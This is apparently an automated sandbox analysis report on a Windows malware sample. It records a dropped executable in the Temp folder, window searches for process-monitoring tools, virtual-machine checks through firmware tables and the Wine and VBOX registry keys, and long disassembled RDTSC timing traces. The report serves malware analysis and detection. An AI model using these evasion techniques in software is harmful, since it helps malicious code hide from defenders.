Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B

Source: file.exe	Static PE information: section name: entropy: 7.982977832144119
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr	Static PE information: section name: entropy: 7.778035325115451

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87EA17 second address: 87EA27 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F661D451436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00C74 second address: A00C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E8Ah 0x00000009 popad 0x0000000a jnl 00007F661CE75E8Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FFD1F second address: 9FFD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FFD23 second address: 9FFD2D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F661CE75E86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FFD2D second address: 9FFD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FFE9B second address: 9FFED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jbe 00007F661CE75E86h 0x00000013 jmp 00007F661CE75E91h 0x00000018 jmp 00007F661CE75E91h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FFED1 second address: 9FFEE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F661D451436h 0x0000000a jnl 00007F661D451436h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FFEE1 second address: 9FFEE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00345 second address: A00349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02B68 second address: 87EA17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 1F2698EAh 0x0000000d push dword ptr [ebp+122D0781h] 0x00000013 movzx esi, cx 0x00000016 sbb di, F69Eh 0x0000001b call dword ptr [ebp+122D2E41h] 0x00000021 pushad 0x00000022 add dword ptr [ebp+122D29D2h], edi 0x00000028 xor eax, eax 0x0000002a cmc 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f mov dword ptr [ebp+122D29D2h], edx 0x00000035 mov dword ptr [ebp+122D38BEh], eax 0x0000003b jmp 00007F661CE75E8Dh 0x00000040 mov esi, 0000003Ch 0x00000045 pushad 0x00000046 jmp 00007F661CE75E8Dh 0x0000004b mov dh, cl 0x0000004d popad 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 cld 0x00000053 clc 0x00000054 lodsw 0x00000056 mov dword ptr [ebp+122D2D4Fh], esi 0x0000005c cld 0x0000005d add eax, dword ptr [esp+24h] 0x00000061 mov dword ptr [ebp+122D29D2h], esi 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b xor dword ptr [ebp+122D2A26h], edx 0x00000071 nop 0x00000072 jp 00007F661CE75E94h 0x00000078 push eax 0x00000079 push edx 0x0000007a push edx 0x0000007b pop edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02BC2 second address: A02C4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F661D451446h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F661D451438h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b sub dword ptr [ebp+122D232Bh], edi 0x00000031 push 00000000h 0x00000033 call 00007F661D451441h 0x00000038 jmp 00007F661D45143Dh 0x0000003d pop esi 0x0000003e call 00007F661D451441h 0x00000043 movzx edi, bx 0x00000046 pop edi 0x00000047 push 1C332BE6h 0x0000004c pushad 0x0000004d pushad 0x0000004e push edi 0x0000004f pop edi 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02C4E second address: A02CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F661CE75E8Ch 0x0000000b popad 0x0000000c xor dword ptr [esp], 1C332B66h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F661CE75E88h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d jmp 00007F661CE75E90h 0x00000032 push 00000003h 0x00000034 mov cx, 598Fh 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D2390h], ecx 0x00000040 push 00000003h 0x00000042 mov esi, dword ptr [ebp+122D2E0Bh] 0x00000048 mov dword ptr [ebp+122D2780h], edx 0x0000004e call 00007F661CE75E89h 0x00000053 pushad 0x00000054 push ebx 0x00000055 pushad 0x00000056 popad 0x00000057 pop ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02CC1 second address: A02CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02CC5 second address: A02CDB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F661CE75E8Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02CDB second address: A02D01 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F661D45143Bh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F661D45143Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02D01 second address: A02D11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02D11 second address: A02D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02D16 second address: A02D42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661CE75E96h 0x00000008 jns 00007F661CE75E86h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02DFF second address: A02E1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451446h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02E1F second address: A02E56 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 jl 00007F661CE75E98h 0x0000000e jmp 00007F661CE75E92h 0x00000013 push 00000000h 0x00000015 mov esi, dword ptr [ebp+122D369Ah] 0x0000001b call 00007F661CE75E89h 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pushad 0x00000024 popad 0x00000025 pop edi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02E56 second address: A02E5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02E5B second address: A02E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F661CE75E90h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F661CE75E95h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0308B second address: A030A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A030A0 second address: A03138 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 7E1C1DC5h 0x0000000f pushad 0x00000010 mov dh, E5h 0x00000012 xor ecx, dword ptr [ebp+122D37DEh] 0x00000018 popad 0x00000019 push 00000003h 0x0000001b call 00007F661CE75E96h 0x00000020 pop ecx 0x00000021 push 00000000h 0x00000023 jl 00007F661CE75E8Ch 0x00000029 add edi, 32FE15BAh 0x0000002f push 00000003h 0x00000031 sub si, E6F8h 0x00000036 push B4596807h 0x0000003b jmp 00007F661CE75E8Fh 0x00000040 xor dword ptr [esp], 74596807h 0x00000047 mov dword ptr [ebp+122D2DB8h], edi 0x0000004d add dword ptr [ebp+122D2337h], edx 0x00000053 lea ebx, dword ptr [ebp+12457AC4h] 0x00000059 push esi 0x0000005a jnc 00007F661CE75E88h 0x00000060 pop esi 0x00000061 mov si, B8BCh 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F661CE75E92h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13DE3 second address: A13DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13DE9 second address: A13DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13DF2 second address: A13DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23CF5 second address: A23CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23CF9 second address: A23D1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F661D451436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jno 00007F661D451436h 0x00000020 jnl 00007F661D451436h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23D1F second address: A23D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F0F4C second address: 9F0F5A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A21BF2 second address: A21BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F661CE75E86h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A21BFF second address: A21C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A21C08 second address: A21C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E99h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A21EBD second address: A21EEA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F661D451443h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F661D451440h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A21EEA second address: A21EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A22147 second address: A2214B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2214B second address: A22162 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jp 00007F661CE75E88h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A22300 second address: A22304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2248F second address: A224AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A224AE second address: A224D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jns 00007F661D451436h 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F661D45143Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A224D1 second address: A224D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A22CC9 second address: A22CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F661D45143Ah 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F661D451438h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F661D451445h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A19F1F second address: A19F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jl 00007F661CE75E86h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A19F30 second address: A19F3D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F661D451436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A22E5A second address: A22E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jmp 00007F661CE75E93h 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A22E77 second address: A22E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D45143Ah 0x00000009 pop esi 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F661D451436h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A22E90 second address: A22EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F661CE75E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23608 second address: A23624 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F661D451444h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23624 second address: A23628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A237A2 second address: A237B2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F661D451436h 0x00000008 je 00007F661D451436h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A237B2 second address: A237B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23B8D second address: A23B91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23B91 second address: A23BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F661CE75E86h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23BA0 second address: A23BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F661D45143Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23BB2 second address: A23BB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23BB7 second address: A23BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F661D451436h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23BC5 second address: A23BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F661CE75E86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A262A1 second address: A262A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A262A7 second address: A262C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F661CE75E92h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A262C6 second address: A262CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A262CC second address: A26312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 jmp 00007F661CE75E99h 0x00000015 pop ecx 0x00000016 mov eax, dword ptr [eax] 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F661CE75E86h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A24BE6 second address: A24BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
